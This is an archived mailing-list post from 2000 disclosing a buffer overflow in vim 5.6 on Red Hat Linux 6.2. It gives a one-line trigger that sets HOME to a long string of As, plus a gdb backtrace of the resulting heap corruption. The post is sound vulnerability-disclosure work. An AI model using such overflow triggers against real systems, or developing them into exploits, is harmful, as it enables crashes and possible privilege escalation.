Vulnerability Development mailing list archives
Red Hat Linux 6.2 - VIM 5.6
From: prrar () NITNET COM BR (Paulo Ribeiro)
Date: Wed, 12 Jul 2000 16:33:12 +0000
Hi, everyone. As Slackware Linux 7.0's elvis, Red Hat Linux 6.2's vi (vim) has the HOME bug. VIM - Vi IMproved 5.6 (2000 Jan 16, compiled Mar 7 2000 12:18:07) Included patches: 1-3, 5-6, 10-11 [user@linux user]$ export HOME=`perl -e 'print "A" x 1024;'` [user@linux user]$ vi ~/test Vim: Caught deadly signal SEGV Vim: Finished. [user@linux user]$ export HOME=`perl -e 'print "A" x 1010;'` Vim: Caught deadly signal SEGV Vim: Double signal, exiting Segmentation fault (core dumped) [user@linux user]$ gdb vi core GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... Core was generated by `vi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libtermcap.so.2...(no debugging symbols found)... done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. Reading symbols from /lib/libnss_files.so.2...done. #0 chunk_free (ar_ptr=0x99e80871, p=0x4010f078) at malloc.c:3049 3049 malloc.c: No such file or directory. (gdb) where #0 chunk_free (ar_ptr=0x99e80871, p=0x4010f078) at malloc.c:3049 #1 0x40079fba in __libc_free (mem=0x4010f080) at malloc.c:3023 #2 0x806d070 in strcpy () at ../sysdeps/generic/strcpy.c:30 #3 0x8063ac0 in strcpy () at ../sysdeps/generic/strcpy.c:30 #4 0x8063239 in strcpy () at ../sysdeps/generic/strcpy.c:30 #5 0x8064408 in strcpy () at ../sysdeps/generic/strcpy.c:30 #6 0x8064459 in strcpy () at ../sysdeps/generic/strcpy.c:30 #7 0x807b4d4 in strcpy () at ../sysdeps/generic/strcpy.c:30 #8 0x8061dd5 in strcpy () at ../sysdeps/generic/strcpy.c:30 #9 0x807adac in strcpy () at ../sysdeps/generic/strcpy.c:30 #10 0x4003ec68 in __restore () at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127 #11 0x40079fba in __libc_free (mem=0x80aa710) at malloc.c:3023 #12 0x806d070 in strcpy () at ../sysdeps/generic/strcpy.c:30 #13 0x806328f in strcpy () at ../sysdeps/generic/strcpy.c:30 #14 0x8064408 in strcpy () at ../sysdeps/generic/strcpy.c:30 #15 0x8064495 in strcpy () at ../sysdeps/generic/strcpy.c:30 #16 0x806c24c in strcpy () at ../sysdeps/generic/strcpy.c:30 #17 0x807add4 in strcpy () at ../sysdeps/generic/strcpy.c:30 #18 0x4003ec68 in __restore () at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127 #19 0x400795ce in __libc_malloc (bytes=1022) at malloc.c:2696 #20 0x806cc93 in strcpy () at ../sysdeps/generic/strcpy.c:30 #21 0x806cbbe in strcpy () at ../sysdeps/generic/strcpy.c:30 #22 0x806cd45 in strcpy () at ../sysdeps/generic/strcpy.c:30 #23 0x806c1f6 in strcpy () at ../sysdeps/generic/strcpy.c:30 #24 0x8063e41 in strcpy () at ../sysdeps/generic/strcpy.c:30 #25 0x8063eb6 in strcpy () at ../sysdeps/generic/strcpy.c:30 #26 0x80631a3 in strcpy () at ../sysdeps/generic/strcpy.c:30 #27 0x806434a in strcpy () at ../sysdeps/generic/strcpy.c:30 #28 0x80643e6 in strcpy () at ../sysdeps/generic/strcpy.c:30 #29 0x805b10c in strcpy () at ../sysdeps/generic/strcpy.c:30 #30 0x80499c8 in strcpy () at ../sysdeps/generic/strcpy.c:30 #31 0x80618b0 in strcpy () at ../sysdeps/generic/strcpy.c:30 #32 0x400389cb in __libc_start_main (main=0x8060a60 <strcpy+94784>, argc=2, argv=0xbffff344, init=0x8049290 <_init>, fini=0x809024c <_fini>, rtld_fini=0x4000ae60 <_dl_fini>, stack_end=0xbffff33c) at ../sysdeps/generic/libc-start.c:92 (gdb) quit Yours, Paulo Ribeiro <prrar () nitnet com br>.
Current thread:
- Re: remote exploit, (continued)
- Re: remote exploit Bluefish (Jul 08)
- Re: remote exploit Gerardo Richarte (Jul 10)
- Re: BitchX /ignore bug Matthew S. Hallacy (Jul 06)
- Updated Default Account Database Eric Knight (Jul 06)
- Re: Updated Default Account Database Jesus D. Muz@oz Largo (Jul 12)
- Re: Updated Default Account Database Nathan Einwechter (Jul 12)
- some things to play with Firstname Lastname (Jul 13)
- Re: some things to play with Vladimir Dubrovin (Jul 14)
- Re: some things to play with Firstname Lastname (Jul 14)
- Re: some things to play with Vladimir Dubrovin (Jul 17)
- Red Hat Linux 6.2 - VIM 5.6 Paulo Ribeiro (Jul 12)
- Re: BitchX /ignore bug Jeremy Gaddis (Jul 06)
- (NT) When exploit CGI's that allow viewing of files... Marc (Jul 06)
- Re: (NT) When exploit CGI's that allow viewing of files... Blue Boar (Jul 06)